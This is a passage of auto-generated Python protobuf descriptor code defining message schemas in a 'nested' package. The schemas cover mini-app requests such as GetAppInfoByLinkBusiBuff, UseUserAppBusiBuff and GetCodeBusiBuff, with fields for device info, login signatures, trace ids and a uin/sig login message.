serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=25,
serialized_end=56,
)
_NESTED_B = _descriptor.Descriptor(
name='b',
full_name='nested.b',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='method', full_name='nested.b.method', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='iv', full_name='nested.b.iv', index=1,
number=2, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=58,
serialized_end=89,
)
_NESTED_JUDGETIMINGBUSIBUFF = _descriptor.Descriptor(
name='JudgeTimingBusiBuff',
full_name='nested.JudgeTimingBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.JudgeTimingBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.JudgeTimingBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.JudgeTimingBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.JudgeTimingBusiBuff.busiBuff', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.JudgeTimingBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.JudgeTimingBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.JudgeTimingBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.JudgeTimingBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.JudgeTimingBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.JudgeTimingBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.JudgeTimingBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=92,
serialized_end=347,
)
_NESTED_GETAPPINFOBYLINKBUSIBUFF = _descriptor.Descriptor(
name='GetAppInfoByLinkBusiBuff',
full_name='nested.GetAppInfoByLinkBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.GetAppInfoByLinkBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.GetAppInfoByLinkBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.GetAppInfoByLinkBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.GetAppInfoByLinkBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.GetAppInfoByLinkBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.GetAppInfoByLinkBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.GetAppInfoByLinkBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.GetAppInfoByLinkBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.GetAppInfoByLinkBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.GetAppInfoByLinkBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.GetAppInfoByLinkBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=350,
serialized_end=589,
)
_NESTED_USEUSERAPP = _descriptor.Descriptor(
name='UseUserApp',
full_name='nested.UseUserApp',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='appId', full_name='nested.UseUserApp.appId', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='verType', full_name='nested.UseUserApp.verType', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='source', full_name='nested.UseUserApp.source', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='channelInfo', full_name='nested.UseUserApp.channelInfo', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=591,
serialized_end=693,
)
_NESTED_CHANNELINFO = _descriptor.Descriptor(
name='channelInfo',
full_name='nested.channelInfo',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='refer', full_name='nested.channelInfo.refer', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='via', full_name='nested.channelInfo.via', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=695,
serialized_end=736,
)
_NESTED_USEUSERAPPBUSIBUFF = _descriptor.Descriptor(
name='UseUserAppBusiBuff',
full_name='nested.UseUserAppBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.UseUserAppBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.UseUserAppBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.UseUserAppBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.UseUserAppBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.UseUserAppBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.UseUserAppBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.UseUserAppBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.UseUserAppBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.UseUserAppBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.UseUserAppBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.UseUserAppBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=739,
serialized_end=972,
)
_NESTED_GETCODEBUSIBUFF = _descriptor.Descriptor(
name='GetCodeBusiBuff',
full_name='nested.GetCodeBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.GetCodeBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.GetCodeBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.GetCodeBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.GetCodeBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.GetCodeBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.GetCodeBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.GetCodeBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.GetCodeBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.GetCodeBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.GetCodeBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.GetCodeBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=975,
serialized_end=1205,
)
_NESTED_GETAPPINFOBYID = _descriptor.Descriptor(
name='GetAppInfoById',
full_name='nested.GetAppInfoById',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='appid', full_name='nested.GetAppInfoById.appid', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='needVersionInfo', full_name='nested.GetAppInfoById.needVersionInfo', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='checkDevRight', full_name='nested.GetAppInfoById.checkDevRight', index=2,
number=3, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='firstPath', full_name='nested.GetAppInfoById.firstPath', index=3,
number=4, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='envVersion', full_name='nested.GetAppInfoById.envVersion', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1207,
serialized_end=1325,
)
_NESTED_GETAPPINFOBYIDBUSIBUFF = _descriptor.Descriptor(
name='GetAppInfoByIdBusiBuff',
full_name='nested.GetAppInfoByIdBusiBuff',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.GetAppInfoByIdBusiBuff.Seq', index=0,
number=1, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='qua', full_name='nested.GetAppInfoByIdBusiBuff.qua', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='deviceInfo', full_name='nested.GetAppInfoByIdBusiBuff.deviceInfo', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.GetAppInfoByIdBusiBuff.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='traceid', full_name='nested.GetAppInfoByIdBusiBuff.traceid', index=4,
number=5, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Module', full_name='nested.GetAppInfoByIdBusiBuff.Module', index=5,
number=6, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Cmdname', full_name='nested.GetAppInfoByIdBusiBuff.Cmdname', index=6,
number=7, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='loginSig', full_name='nested.GetAppInfoByIdBusiBuff.loginSig', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Crypto', full_name='nested.GetAppInfoByIdBusiBuff.Crypto', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.GetAppInfoByIdBusiBuff.Extinfo', index=9,
number=10, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='contentType', full_name='nested.GetAppInfoByIdBusiBuff.contentType', index=10,
number=11, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1328,
serialized_end=1565,
)
_NESTED_D = _descriptor.Descriptor(
name='d',
full_name='nested.d',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='Seq', full_name='nested.d.Seq', index=0,
number=1, type=5, cpp_type=1, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='retCode', full_name='nested.d.retCode', index=1,
number=2, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='errMsg', full_name='nested.d.errMsg', index=2,
number=3, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='busiBuff', full_name='nested.d.busiBuff', index=3,
number=4, type=12, cpp_type=9, label=1,
has_default_value=False, default_value=b"",
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='Extinfo', full_name='nested.d.Extinfo', index=4,
number=5, type=11, cpp_type=10, label=3,
has_default_value=False, default_value=[],
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=None,
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
],
serialized_start=1567,
serialized_end=1662,
)
_NESTED_C0011A = _descriptor.Descriptor(
name='C0011a',
full_name='nested.C0011a',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='uin', full_name='nested.C0011a.uin', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='sig', full_name='nested.C0011a.sig', index=1,
number=2, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='platform', full_name='nested.C0011a.platform', index=2,
number=3, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=None, file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
